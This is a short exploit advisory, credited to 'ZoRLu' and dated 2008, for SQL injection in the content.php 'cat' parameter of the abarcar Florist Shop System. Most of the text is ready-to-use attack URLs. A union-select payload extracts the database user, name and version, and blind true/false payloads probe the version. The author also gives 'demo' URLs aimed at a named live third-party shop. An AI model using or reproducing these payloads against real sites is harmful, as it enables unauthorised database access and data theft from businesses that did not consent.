[~] abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
[~]
[~] script: http://www.abarcar.com/content_18.php
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------


Exploit: ( remote )

http://localhost/script_path/content.php?cat=[SQL]

[SQL]= 

-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


exploit for demo: ( you must look title )

http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


Exploit: ( blind )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )


exploit for demo:

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )


[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------